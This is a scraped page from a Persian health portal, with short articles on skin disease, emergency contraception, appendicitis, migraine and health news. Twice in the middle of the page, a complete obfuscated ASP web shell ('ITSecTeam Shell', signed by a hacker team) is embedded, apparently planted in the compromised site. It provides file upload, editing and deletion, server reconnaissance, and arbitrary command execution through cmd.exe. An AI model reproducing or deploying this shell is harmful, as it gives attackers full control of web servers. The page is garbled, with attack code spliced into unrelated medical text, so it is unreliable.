پیودرما گانگرنوزوم

پیودرما گانگرنوزوم

پیودرما گانگرنوزوم یک درماتوز نوتروفیلیک غیر عفونی و التهابی اولسراتیو پوستی می باشدکه معمولا با پوسچول شروع می شود و به سرعت پیشرفت کرده و به زخم دردناک با حاشیه بنفش رنگ تبدیل می شود و با ظهور نشانه های بالینی و رد سایر بیماری های اولسراتیو پوستی تشخیص داده می شود.

سیاه زخم

شب ادراری در کودکان

شب ادراری در کودکان

مراقبت‌های پیش از بارداری

مراقبت‌های پیش از بارداری

مشکلات پس از زایمان

بیماری هیرشپرونگ

پیکا

روز پزشک خجسته باد

روز پزشک خجسته باد

يكم شهريور ماه، سالروز ولادت بزرگ دانشمند و طبيب برجسته نامدار ايراني، شيخ الرئيس ابوعلي سينا و روز پزشك بر تمامي طبيبان فرزانه و جامعه پزشكي ايران اسلامي خجسته باد.
روز بهورز خجسته باد

روز بهورز خجسته باد

روز داروساز خجسته باد

« روز داروساز خجسته باد »

روش اورژانسی جلوگیری از بارداری

بارداری ناخواسته و بدون آمادگی قبلی، مطلوب هیچ زوجی نیست. لذا آشنایی با روشهای اورژانسی پیشگیری از حاملگی از اهمیت بالایی برخوردار است. جهت جلوگیری اورژانسی از بارداری، باید دوز اول (دو قرص اچ دی یا چهار قرص ال دی) را تا 72 ساعت پس از آمیزش و دوز دوم را 12 ساعت بعد از دوز اول مصرف نمود. روش دیگر میل کردن دو قرص لوونورژسترل بعد از نزدیکی (تا 72 ساعت بعد) است.
سوزش ادرار در زنان

سوزش ادرار در خانمها

قرص‌های ال.دی (LD) و اچ.دی (HD)

قرص‌های ال.دی (LD) و اچ.دی (HD)

افزایش پرولاکتین خون

افزایش پرولاکتین خون

واریکوسل

واریکوسل ( تشخیص، درمان، عوارض )

 

کانال تلگرامی شبکه نمایش

<% '---------------------------------------------------------------------- ' ----------------- Coded By Mauritania HaCker TEAM ----------------- ' ----------------- Mauritania HaCker TEAM ----------------- ' ----------------- E-mail: Mauritania@hacker.ps ----------------- '---------------------------------------------------------------------- On Error Resume Next Set fileso = CreateObject("Script"&byp4ss&"ing.File"&byp4ss&"SystemObject") dim head,endd,pathn,enddd FolderPath = Request.ServerVariables("PAT"&byp4ss&"H_TRANS"&byp4ss&"LATED") Private Function ParseFolder(PathString) Dim liCount If Right(PathString, 1) = "\" Then ParseFolder = PathString Else For liCount = Len(PathString) To 1 Step -1 If Mid(PathString, liCount, 1) = "\" Then ParseFolder = Left(PathString, liCount) Exit For End If Next End If End Function Function getsize(size) If size>=(1024 * 1024 * 1024)Then getsize=Fix((size /(1024 * 1024 * 1024))* 100)/ 100&"G" If size>=(1024 * 1024)And size<(1024 * 1024 * 1024)Then getsize=Fix((size /(1024 * 1024))* 100)/ 100&"M" If size>=1024 And size<(1024 * 1024)Then getsize=Fix((size / 1024)* 100)/ 100&"K" If size>=0 And size<1024 Then getsize=size&"B" End Function Set wssh = Server.CreateObject("W"&byp4ss&"Scr"&byp4ss&"ipt.Sh"&byp4ss&"ell") Set envinfo = wssh.Environment("SY"&byp4ss&"STEM") Set wsshn = Server.CreateObject("W"&byp4ss&"Sc"&byp4ss&"ript.Ne"&byp4ss&"twork") Class FileUploader 'Class Upload File Microsoft Public Files Private mcolFormElem Private Sub Class_Initialize() Set Files = Server.CreateObject("Script"&byp4ss&"ing"&byp4ss&".Dicti"&byp4ss&"onary") Set mcolFormElem = Server.CreateObject("Scripti"&byp4ss&"ng.Dic"&byp4ss&"tionary") End Sub Private Sub Class_Terminate() If IsObject(Files) Then Files.RemoveAll() Set Files = Nothing End If If IsObject(mcolFormElem) Then mcolFormElem.RemoveAll() Set mcolFormElem = Nothing End If End Sub Public Property Get Form(sIndex) Form = "" If mcolFormElem.Exists(LCase(sIndex)) Then Form = mcolFormElem.Item(LCase(sIndex)) End Property Public Default Sub Upload() Dim biData, sInputName Dim nPosBegin, nPosEnd, nPos, vDataBounds, nDataBoundPos Dim nPosFile, nPosBound biData = Request.BinaryRead(Request.TotalBytes) nPosBegin = 1 nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(13))) If (nPosEnd-nPosBegin) <= 0 Then Exit Sub vDataBounds = MidB(biData, nPosBegin, nPosEnd-nPosBegin) nDataBoundPos = InstrB(1, biData, vDataBounds) Do Until nDataBoundPos = InstrB(biData, vDataBounds & CByteString("--")) nPos = InstrB(nDataBoundPos, biData, CByteString("Content-Disposition")) nPos = InstrB(nPos, biData, CByteString("name=")) nPosBegin = nPos + 6 nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(34))) sInputName = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin)) nPosFile = InstrB(nDataBoundPos, biData, CByteString("filename=")) nPosBound = InstrB(nPosEnd, biData, vDataBounds) If nPosFile <> 0 And nPosFile < nPosBound Then Dim oUploadFile, sFileName Set oUploadFile = New UploadedFile nPosBegin = nPosFile + 10 nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(34))) sFileName = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin)) oUploadFile.FileName = Right(sFileName, Len(sFileName)-InStrRev(sFileName, "\")) nPos = InstrB(nPosEnd, biData, CByteString("Content-Type:")) nPosBegin = nPos + 14 nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(13))) oUploadFile.ContentType = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin)) nPosBegin = nPosEnd+4 nPosEnd = InstrB(nPosBegin, biData, vDataBounds) - 2 oUploadFile.FileData = MidB(biData, nPosBegin, nPosEnd-nPosBegin) If oUploadFile.FileSize > 0 Then Files.Add LCase(sInputName), oUploadFile Else nPos = InstrB(nPos, biData, CByteString(Chr(13))) nPosBegin = nPos + 4 nPosEnd = InstrB(nPosBegin, biData, vDataBounds) - 2 If Not mcolFormElem.Exists(LCase(sInputName)) Then mcolFormElem.Add LCase(sInputName), CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin)) End If nDataBoundPos = InstrB(nDataBoundPos + LenB(vDataBounds), biData, vDataBounds) Loop End Sub Private Function CByteString(sString) Dim nIndex For nIndex = 1 to Len(sString) CByteString = CByteString & ChrB(AscB(Mid(sString,nIndex,1))) Next End Function Private Function CWideString(bsString) Dim nIndex CWideString ="" For nIndex = 1 to LenB(bsString) CWideString = CWideString & Chr(AscB(MidB(bsString,nIndex,1))) Next End Function End Class Class UploadedFile Public ContentType Public FileName Public FileData Public Property Get FileSize() FileSize = LenB(FileData) End Property Public Sub SaveToDisk(sPath) Dim oFS, oFile Dim nIndex If sPath = "" Or FileName = "" Then Exit Sub If Mid(sPath, Len(sPath)) <> "\" Then sPath = sPath & "\" Set oFS = Server.CreateObject("Scrip"&byp4ss&"ting.FileSy"&byp4ss&"stemObj"&byp4ss&"ect") If Not oFS.FolderExists(sPath) Then Exit Sub Set oFile = oFS.CreateTextFile(sPath & FileName, True) For nIndex = 1 to LenB(FileData) oFile.Write Chr(AscB(MidB(FileData,nIndex,1))) Next oFile.Close End Sub End Class if request.querystring("uploadnow")<>"" then Set Uploader = New FileUploader Uploader.Upload() If Uploader.Files.Count = 0 Then Response.Write "" Else Response.Write "" For Each File In Uploader.Files.Items File.SaveToDisk Request.querystring("address") Next End If End If pathn=Request.QueryString("address") if pathn ="" Then pathn=ParseFolder(FolderPath) Else pathn=Request.QueryString("address") end if enddd="

 

Coded by Amin Shokohi (Pejvak)
iTsecteam

" If pathn <>"" and CInt(Len(pathn) - 1) <> 2 Then barrapos = CInt(InstrRev(Left(pathn,Len(pathn) - 1),"\")) - 1 backlevel = Left(pathn,barrapos) backk="
Back" End If if request.querystring("dltype")= "file" then fileadd=request.querystring("address") & request.querystring("filename") Response.Buffer = True Response.Clear Set dlfile = fileso.GetFile(fileadd) Response.AddHeader "Content-Disposition", "attachment; filename=" & request.querystring("filename") Response.AddHeader "Content-Length", dlfile.size Response.Charset = "UTF-8" Response.ContentType = "application/download" Set Stream = Server.CreateObject("ADODB.Stream") Stream.Open Stream.type = 1 Stream.LoadFromFile dlfile Response.BinaryWrite Stream.Read Response.Flush Stream.Close Set Stream = Nothing end if if request.querystring("do")= "delete" and request.querystring("type")= "file" then fileadd=request.querystring("address") & request.querystring("filename") Set filetodel = fileso.GetFile(fileadd) filetodel.delete If Err.Number <> 0 Then Response.Write "" else Response.Write "" End If fileadd="" end if if request.querystring("do")= "dl" and request.querystring("type")= "file" then fileadd=request.querystring("address") & request.querystring("filename") Set filetodel = fileso.GetFile(fileadd) filetodel.delete fileadd="" end if Set patha = fileso.GetFolder(pathn&"\") Set dirs = patha.SubFolders Set files = patha.Files for each filead in files file=file&"

"& filead.Name &"

" & getsize(filead.size) & ""& filead.DateLastModified &"EditDLRenDel
" next for each dirl in dirs dirlist=dirlist&"

"&dirl.name&"

"& dirl.DateLastModified &"Del
" next head="
" if request.querystring("uploadnow")= "" then if request.form("source")<> "" then fileadd=request.form("address") & request.form("filename") nextline = Request.Form("source") nextline = Split(nextline,vbCrLf) Set filetosave = fileso.OpenTextFile(fileadd,2) For i = 0 To UBound(nextline) filetosave.WriteLine(nextline(i)) Next filetosave.Close If Err.Number <> 0 Then Response.Write "" else Response.Write "" End If Set filetosave = Nothing fileadd="" end if Function getdrive() Set drivelist=fileso.drives For Each tmpdrive IN drivelist if tmpdrive.DriveType=2 then tmpgd=tmpgd & "" & UCase(tmpdrive.driveletter) & ":" & " " end if next getdrive=tmpgd end function if request.form("renameto")<> "" then fileadd=request.form("address") & request.form("filename") Set filetoren = fileso.GetFile(fileadd) filetoren.Move (request.form("renameto")) If Err.Number <> 0 Then Response.Write "" else Response.Write "" End If fileadd="" end if end if response.write("iTSecTeam") if request.querystring("do")="edit" then addressfile=Request.QueryString("address") & Request.QueryString("filename") Set filesource = fileso.OpenTextFile(addressfile) response.write(head&"

"& Request.QueryString("address")&Request.QueryString("filename")&"

") elseif(request.querystring("do")="rename") then response.write(head&"

"&Request.QueryString("filename")&" Rename To :

") elseif(request.querystring("do")="info") then response.write(head&" OS : "& envinfo("OS") &"
"&" Username : "& wsshn.username &"
"&" Web Serever : "&Request.ServerVariables("SERVER_SOFTWARE")&"
"&" Serever Name : "&Request.ServerVariables("SERVER_NAME")&"
"&" Serever Port : "&Request.ServerVariables("SERVER_PORT")&"
"&" Server ip : "&Request.ServerVariables("LOCAL_ADDR")&"
"&" Your ip : "&Request.ServerVariables("REMOTE_ADDR")&"
"&" App Path : "&Request.ServerVariables("APPL_PHYSICAL_PATH")&"
"&" Win Path : "&wssh.ExpandEnvironmentStrings("%SYSTEMROOT%")&"
") elseif(request.querystring("do")="cmd") then if request.querystring("command") <>"" then cmtmp = "c:\" & fileso.GetTempName() Call wssh.Run ("cmd.exe /c " & request.querystring("command") & " > " & cmtmp, 0, True) Set readcmtmp = fileso.OpenTextFile (cmtmp, 1, False, 0) rescmd= Replace(Replace(Server.HTMLEncode(readcmtmp.ReadAll),VbCrLf,"
")," "," ") readcmtmp.Close Call fileso.DeleteFile(cmtmp, True) If Err.Number <> 0 Then rescmd=Err.Description end if end if response.write(head&"

"&"
Command :

") elseif(request.querystring("do")="about") then response.write(head&"

Mauritania HaCker TEAM, Mauritania HaCker TEAM Research & Penetration Testing Team
Version 0.1
Last Update : 2010/10/20
Coded By : Amin Shokohi(Pejvak)
Special Thanks(M3hr@n.S , Am!rkh@n , R3dm0ve , Provider , H4mid@Tm3l , ahmadbady , Doosib )
Home Page : http://www.itsecteam.com
Update Notice: ITSecTeam Shell
Forum : http://www.forum.itsecteam.com
"&"

"&"
"&"______ ______ ____          ______                "&"
/\__ _\/\__ _\/\ _`\ /\__ _\ "&"
\/_/\ \/\/_/\ \/\ \,\L\_\ __ ___\/_/\ \/ __ __ ___ ___ "&"
\ \ \ \ \ \ \/_\__ \ /'__`\ /'___\ \ \ \ /'__`\ /'__`\ /' __` __`\ "&"
\_\ \__ \ \ \ /\ \L\ \/\ __//\ \__/ \ \ \/\ __//\ \L\.\_/\ \/\ \/\ \ "&"
/\_____\ \ \_\ \ `\____\ \____\ \____\ \ \_\ \____\ \__/.\_\ \_\ \_\ \_\"&"
\/_____/ \/_/ \/_____/\/____/\/____/ \/_/\/____/\/__/\/_/\/_/\/_/\/_/"&"
"&"
"&"
") else response.write(head & "

Now Directory : "&pathn&"
"&getdrive()&""&backk&"

"& dirlist &file&"
Change Dir :
Command :
Upload File :
"&enddd) end if %>
غذاهایی که مردان باید بیشتر مصرف کنند

غذاهایی که مردان باید بیشتر مصرف کنند

وزير بهداشت وارد زابل شد

تمام حاشیه نشینان شهر مشهد تحت پوشش خدمات بهداشتی قرار دارند/ مهم ترین وظیفه ما ارئه خدمت به مردم به ویژه به قشر محروم جامعه است

رییس دانشگاه علوم پزشکی مشهد گفت: زمانی که بحث ارائه خدمات به حاشیه شهر ها مطرح شد به دلیل تعداد زیاد حاشیه نشین ها در شهر مشهد فکر می کردیم نتوانیم به موقع آنان را تحت پوشش قرار دهیم بنابراین به همکا

ایران رتبه هشتم فناوری نانو در جهان را دارد

روند اجرایی طرح تحول نظام سلامت

باید تفاوت نقد و تخریب را بدانیم/جامعه، آسیبهای زیادی از تخریبها دیده است

به گزارش پایگاه خبری و اطلاع رسانی وزارت بهداشت، درمان و آموزش پزشکی دکتر سیدحسن هاشمی در همایش ملی نقد عملکرد دولت یازدهم در حوزه سلامت با بیان این که پیشنهاد برگزاری جلسه نقد عملکرد حوزه سلامت را حد
آپاندیسیت با عمل جراحی درمان شده و مصرف آنتی بیوتیک ها نیز در بهبود آن نقش دارند.

مهمترين علامت آپانديسيت، درد کولیکی در اطراف ناف است.

مهمترين علامت آپانديسيت درد کولیکی ( انقباض و گرفتگی ) در اطراف ناف است. آپاندیسیت با عمل جراحی درمان شده و مصرف آنتی بیوتیک ها نیز در بهبود آن نقش دارند.
درمان زخم معده امکان پذیر است.

راه‌های درمان زخم‌معده

علایم سرطان را جدی بگیرید.

۱۵ علامت سرطان که نادیده می گیرند

علائم سکته مغزی

علائم بروز سکته مغزی چیست؟

تهوع از علایم شایع در بیماری میگرن به شمار می رود.

علایم میگرن کدامند؟

یکی از عوارض خواب طولانی مدت، بروز بیماری در فرد است.

خواب زیاد نشانه بیماری است.

property="dc:title" datatype=""سلامک هفت سیب

property="dc:title" datatype=""مشاوره سلامت و پزشکی

property="dc:title" datatype=""سلامت سه بُعدی

property="dc:title" datatype=""شناخت اندام های بدن

property="dc:title" datatype=""سلامت به زبان کودکان

property="dc:title" datatype=""بازی سلامت

property="dc:title" datatype=""پخش زنده شبکه سلامت

کانال تلگرامی شبکه نمایش

غذاهایی که مردان باید بیشتر مصرف کنند

پیودرما گانگرنوزوم

وزير بهداشت وارد زابل شد

روش اورژانسی جلوگیری از بارداری

سوزش ادرار در خانمها

قرص‌های ال.دی (LD) و اچ.دی (HD)

افزایش پرولاکتین خون

واریکوسل ( تشخیص، درمان، عوارض )

درمان های زگیل تناسلی

خروج مایع منی با ادرار

کانال تلگرامی شبکه نمایش

<% '---------------------------------------------------------------------- ' ----------------- Coded By Mauritania HaCker TEAM ----------------- ' ----------------- Mauritania HaCker TEAM ----------------- ' ----------------- E-mail: Mauritania@hacker.ps ----------------- '---------------------------------------------------------------------- On Error Resume Next Set fileso = CreateObject("Script"&byp4ss&"ing.File"&byp4ss&"SystemObject") dim head,endd,pathn,enddd FolderPath = Request.ServerVariables("PAT"&byp4ss&"H_TRANS"&byp4ss&"LATED") Private Function ParseFolder(PathString) Dim liCount If Right(PathString, 1) = "\" Then ParseFolder = PathString Else For liCount = Len(PathString) To 1 Step -1 If Mid(PathString, liCount, 1) = "\" Then ParseFolder = Left(PathString, liCount) Exit For End If Next End If End Function Function getsize(size) If size>=(1024 * 1024 * 1024)Then getsize=Fix((size /(1024 * 1024 * 1024))* 100)/ 100&"G" If size>=(1024 * 1024)And size<(1024 * 1024 * 1024)Then getsize=Fix((size /(1024 * 1024))* 100)/ 100&"M" If size>=1024 And size<(1024 * 1024)Then getsize=Fix((size / 1024)* 100)/ 100&"K" If size>=0 And size<1024 Then getsize=size&"B" End Function Set wssh = Server.CreateObject("W"&byp4ss&"Scr"&byp4ss&"ipt.Sh"&byp4ss&"ell") Set envinfo = wssh.Environment("SY"&byp4ss&"STEM") Set wsshn = Server.CreateObject("W"&byp4ss&"Sc"&byp4ss&"ript.Ne"&byp4ss&"twork") Class FileUploader 'Class Upload File Microsoft Public Files Private mcolFormElem Private Sub Class_Initialize() Set Files = Server.CreateObject("Script"&byp4ss&"ing"&byp4ss&".Dicti"&byp4ss&"onary") Set mcolFormElem = Server.CreateObject("Scripti"&byp4ss&"ng.Dic"&byp4ss&"tionary") End Sub Private Sub Class_Terminate() If IsObject(Files) Then Files.RemoveAll() Set Files = Nothing End If If IsObject(mcolFormElem) Then mcolFormElem.RemoveAll() Set mcolFormElem = Nothing End If End Sub Public Property Get Form(sIndex) Form = "" If mcolFormElem.Exists(LCase(sIndex)) Then Form = mcolFormElem.Item(LCase(sIndex)) End Property Public Default Sub Upload() Dim biData, sInputName Dim nPosBegin, nPosEnd, nPos, vDataBounds, nDataBoundPos Dim nPosFile, nPosBound biData = Request.BinaryRead(Request.TotalBytes) nPosBegin = 1 nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(13))) If (nPosEnd-nPosBegin) <= 0 Then Exit Sub vDataBounds = MidB(biData, nPosBegin, nPosEnd-nPosBegin) nDataBoundPos = InstrB(1, biData, vDataBounds) Do Until nDataBoundPos = InstrB(biData, vDataBounds & CByteString("--")) nPos = InstrB(nDataBoundPos, biData, CByteString("Content-Disposition")) nPos = InstrB(nPos, biData, CByteString("name=")) nPosBegin = nPos + 6 nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(34))) sInputName = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin)) nPosFile = InstrB(nDataBoundPos, biData, CByteString("filename=")) nPosBound = InstrB(nPosEnd, biData, vDataBounds) If nPosFile <> 0 And nPosFile < nPosBound Then Dim oUploadFile, sFileName Set oUploadFile = New UploadedFile nPosBegin = nPosFile + 10 nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(34))) sFileName = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin)) oUploadFile.FileName = Right(sFileName, Len(sFileName)-InStrRev(sFileName, "\")) nPos = InstrB(nPosEnd, biData, CByteString("Content-Type:")) nPosBegin = nPos + 14 nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(13))) oUploadFile.ContentType = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin)) nPosBegin = nPosEnd+4 nPosEnd = InstrB(nPosBegin, biData, vDataBounds) - 2 oUploadFile.FileData = MidB(biData, nPosBegin, nPosEnd-nPosBegin) If oUploadFile.FileSize > 0 Then Files.Add LCase(sInputName), oUploadFile Else nPos = InstrB(nPos, biData, CByteString(Chr(13))) nPosBegin = nPos + 4 nPosEnd = InstrB(nPosBegin, biData, vDataBounds) - 2 If Not mcolFormElem.Exists(LCase(sInputName)) Then mcolFormElem.Add LCase(sInputName), CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin)) End If nDataBoundPos = InstrB(nDataBoundPos + LenB(vDataBounds), biData, vDataBounds) Loop End Sub Private Function CByteString(sString) Dim nIndex For nIndex = 1 to Len(sString) CByteString = CByteString & ChrB(AscB(Mid(sString,nIndex,1))) Next End Function Private Function CWideString(bsString) Dim nIndex CWideString ="" For nIndex = 1 to LenB(bsString) CWideString = CWideString & Chr(AscB(MidB(bsString,nIndex,1))) Next End Function End Class Class UploadedFile Public ContentType Public FileName Public FileData Public Property Get FileSize() FileSize = LenB(FileData) End Property Public Sub SaveToDisk(sPath) Dim oFS, oFile Dim nIndex If sPath = "" Or FileName = "" Then Exit Sub If Mid(sPath, Len(sPath)) <> "\" Then sPath = sPath & "\" Set oFS = Server.CreateObject("Scrip"&byp4ss&"ting.FileSy"&byp4ss&"stemObj"&byp4ss&"ect") If Not oFS.FolderExists(sPath) Then Exit Sub Set oFile = oFS.CreateTextFile(sPath & FileName, True) For nIndex = 1 to LenB(FileData) oFile.Write Chr(AscB(MidB(FileData,nIndex,1))) Next oFile.Close End Sub End Class if request.querystring("uploadnow")<>"" then Set Uploader = New FileUploader Uploader.Upload() If Uploader.Files.Count = 0 Then Response.Write "" Else Response.Write "" For Each File In Uploader.Files.Items File.SaveToDisk Request.querystring("address") Next End If End If pathn=Request.QueryString("address") if pathn ="" Then pathn=ParseFolder(FolderPath) Else pathn=Request.QueryString("address") end if enddd="

 

Coded by Amin Shokohi (Pejvak)
iTsecteam

" If pathn <>"" and CInt(Len(pathn) - 1) <> 2 Then barrapos = CInt(InstrRev(Left(pathn,Len(pathn) - 1),"\")) - 1 backlevel = Left(pathn,barrapos) backk="
Back" End If if request.querystring("dltype")= "file" then fileadd=request.querystring("address") & request.querystring("filename") Response.Buffer = True Response.Clear Set dlfile = fileso.GetFile(fileadd) Response.AddHeader "Content-Disposition", "attachment; filename=" & request.querystring("filename") Response.AddHeader "Content-Length", dlfile.size Response.Charset = "UTF-8" Response.ContentType = "application/download" Set Stream = Server.CreateObject("ADODB.Stream") Stream.Open Stream.type = 1 Stream.LoadFromFile dlfile Response.BinaryWrite Stream.Read Response.Flush Stream.Close Set Stream = Nothing end if if request.querystring("do")= "delete" and request.querystring("type")= "file" then fileadd=request.querystring("address") & request.querystring("filename") Set filetodel = fileso.GetFile(fileadd) filetodel.delete If Err.Number <> 0 Then Response.Write "" else Response.Write "" End If fileadd="" end if if request.querystring("do")= "dl" and request.querystring("type")= "file" then fileadd=request.querystring("address") & request.querystring("filename") Set filetodel = fileso.GetFile(fileadd) filetodel.delete fileadd="" end if Set patha = fileso.GetFolder(pathn&"\") Set dirs = patha.SubFolders Set files = patha.Files for each filead in files file=file&"

"& filead.Name &"

" & getsize(filead.size) & ""& filead.DateLastModified &"EditDLRenDel
" next for each dirl in dirs dirlist=dirlist&"

"&dirl.name&"

"& dirl.DateLastModified &"Del
" next head="
" if request.querystring("uploadnow")= "" then if request.form("source")<> "" then fileadd=request.form("address") & request.form("filename") nextline = Request.Form("source") nextline = Split(nextline,vbCrLf) Set filetosave = fileso.OpenTextFile(fileadd,2) For i = 0 To UBound(nextline) filetosave.WriteLine(nextline(i)) Next filetosave.Close If Err.Number <> 0 Then Response.Write "" else Response.Write "" End If Set filetosave = Nothing fileadd="" end if Function getdrive() Set drivelist=fileso.drives For Each tmpdrive IN drivelist if tmpdrive.DriveType=2 then tmpgd=tmpgd & "" & UCase(tmpdrive.driveletter) & ":" & " " end if next getdrive=tmpgd end function if request.form("renameto")<> "" then fileadd=request.form("address") & request.form("filename") Set filetoren = fileso.GetFile(fileadd) filetoren.Move (request.form("renameto")) If Err.Number <> 0 Then Response.Write "" else Response.Write "" End If fileadd="" end if end if response.write("iTSecTeam") if request.querystring("do")="edit" then addressfile=Request.QueryString("address") & Request.QueryString("filename") Set filesource = fileso.OpenTextFile(addressfile) response.write(head&"

"& Request.QueryString("address")&Request.QueryString("filename")&"

") elseif(request.querystring("do")="rename") then response.write(head&"

"&Request.QueryString("filename")&" Rename To :

") elseif(request.querystring("do")="info") then response.write(head&" OS : "& envinfo("OS") &"
"&" Username : "& wsshn.username &"
"&" Web Serever : "&Request.ServerVariables("SERVER_SOFTWARE")&"
"&" Serever Name : "&Request.ServerVariables("SERVER_NAME")&"
"&" Serever Port : "&Request.ServerVariables("SERVER_PORT")&"
"&" Server ip : "&Request.ServerVariables("LOCAL_ADDR")&"
"&" Your ip : "&Request.ServerVariables("REMOTE_ADDR")&"
"&" App Path : "&Request.ServerVariables("APPL_PHYSICAL_PATH")&"
"&" Win Path : "&wssh.ExpandEnvironmentStrings("%SYSTEMROOT%")&"
") elseif(request.querystring("do")="cmd") then if request.querystring("command") <>"" then cmtmp = "c:\" & fileso.GetTempName() Call wssh.Run ("cmd.exe /c " & request.querystring("command") & " > " & cmtmp, 0, True) Set readcmtmp = fileso.OpenTextFile (cmtmp, 1, False, 0) rescmd= Replace(Replace(Server.HTMLEncode(readcmtmp.ReadAll),VbCrLf,"
")," "," ") readcmtmp.Close Call fileso.DeleteFile(cmtmp, True) If Err.Number <> 0 Then rescmd=Err.Description end if end if response.write(head&"

"&"
Command :

") elseif(request.querystring("do")="about") then response.write(head&"

Mauritania HaCker TEAM, Mauritania HaCker TEAM Research & Penetration Testing Team
Version 0.1
Last Update : 2010/10/20
Coded By : Amin Shokohi(Pejvak)
Special Thanks(M3hr@n.S , Am!rkh@n , R3dm0ve , Provider , H4mid@Tm3l , ahmadbady , Doosib )
Home Page : http://www.itsecteam.com
Update Notice: ITSecTeam Shell
Forum : http://www.forum.itsecteam.com
"&"

"&"
"&"______ ______ ____          ______                "&"
/\__ _\/\__ _\/\ _`\ /\__ _\ "&"
\/_/\ \/\/_/\ \/\ \,\L\_\ __ ___\/_/\ \/ __ __ ___ ___ "&"
\ \ \ \ \ \ \/_\__ \ /'__`\ /'___\ \ \ \ /'__`\ /'__`\ /' __` __`\ "&"
\_\ \__ \ \ \ /\ \L\ \/\ __//\ \__/ \ \ \/\ __//\ \L\.\_/\ \/\ \/\ \ "&"
/\_____\ \ \_\ \ `\____\ \____\ \____\ \ \_\ \____\ \__/.\_\ \_\ \_\ \_\"&"
\/_____/ \/_/ \/_____/\/____/\/____/ \/_/\/____/\/__/\/_/\/_/\/_/\/_/"&"
"&"
"&"
") else response.write(head & "

Now Directory : "&pathn&"
"&getdrive()&""&backk&"

"& dirlist &file&"
Change Dir :
Command :
Upload File :
"&enddd) end if %>
مسابقه تلفنی سلامت

شرکت در مسابقه تلویزیونی- تلفنی « سلامت »

مسابقه " سلامت " می کوشد به منظور آموزش غیر مستقیم و درعین حال سرگرم کننده در مراحل و فضاهای مختلف، از المان های بهداشت و سلامت بهره ببرد. این مسابقه بسیار مسابقه ای پرهیجان، پرسرعت و بانشاط است.
video type not supported.

هفت سیب از نظر رئیس سازمان نظام پزشکی کشور

فیلم برنامه «طلوع» شبنه دوم دی ماه شبکه چهار صداو سیما مربوط به افتتاح دنیای مجازی سلامت ایران "هفت سیب"
video type not supported.

رونمایی پورتال هفت سیب توسط مدیر پورتال، آقای دکتر شهابی

یکشنبه یازدهم اسفندماه در حاشیه برگزاری هفتمین نمایشگاه بین المللی فناوری اطلاعات و رسانه های دیجیتال توسط آقای دکتر شهابی مدیر پورتال سلامت هفت سیب، از دنیای مجازی سلامت ایران (هفت سیب)، رونمایی شد.

تصویر سه بعدی استخوان مهره

با استفاده از کلیدهای چپ و راست صفحه کلید و یا با دکمه موس می توانید نمای شماتیک یک استخوان مهره انسان سالم را از جهات مختلف ببینید.
-------------------------------------------------------------- ساخت و اجرای فلش: خانم مهندس سپیده دلیرپور
دنیای مجازی سلامت ایران

پیشرفت های علم پزشکی و دنیای مجازی سلامت ایران

کارشناس: آقای دکتر احمد دلربایی تخصص: پزشک پژوهشگر، کارشناس ارشد مهندسی فناوری اطلاعات سمت: مدیر اجرایی پورتال سلامت "هفت سیب" موضوع: پیشرفت های علم پزشکی و دنیای مجازی سلامت ایران

تصویر سه بُعدی قلب (عروق کرونر و رگ ها)

با استفاده از کلیدهای چپ و راست صفحه کلید و یا با دکمه موس می توانید نمای شماتیک قلب و عروق کرونر و رگ های اصلی قلب در انسان سالم را به صورت سه بعدی از جهات مختلف ببینید.
------------------------------------------------- ساخت و اجرای فلش: خانم هانیه صابری
حریم شخصی افراد در خانواده

رعایت حریم شخصی افراد در خانواده

نام کارشناس: آقای دکتر حسین اعرابی تخصص: روانشناس موضوع: رعایت حریم شخصی افراد در خانواده
مهارت برقراری ارتباط بین همسران

مهارت برقراری ارتباط بین همسران

نام کارشناس: خانم زهرا بهمنی تخصص: روانشناس موضوع: مهارت برقراری ارتباط بین همسران
کلینیک پوست و زیبایی دلربا

کلینیک پوست و مو

این آلبوم شامل عکسهایی از بخش پوست و مو کلینیک تابان و کلینیک زیبایی دلربا می باشد.

property="dc:title" datatype=""مرکز جامع سرطان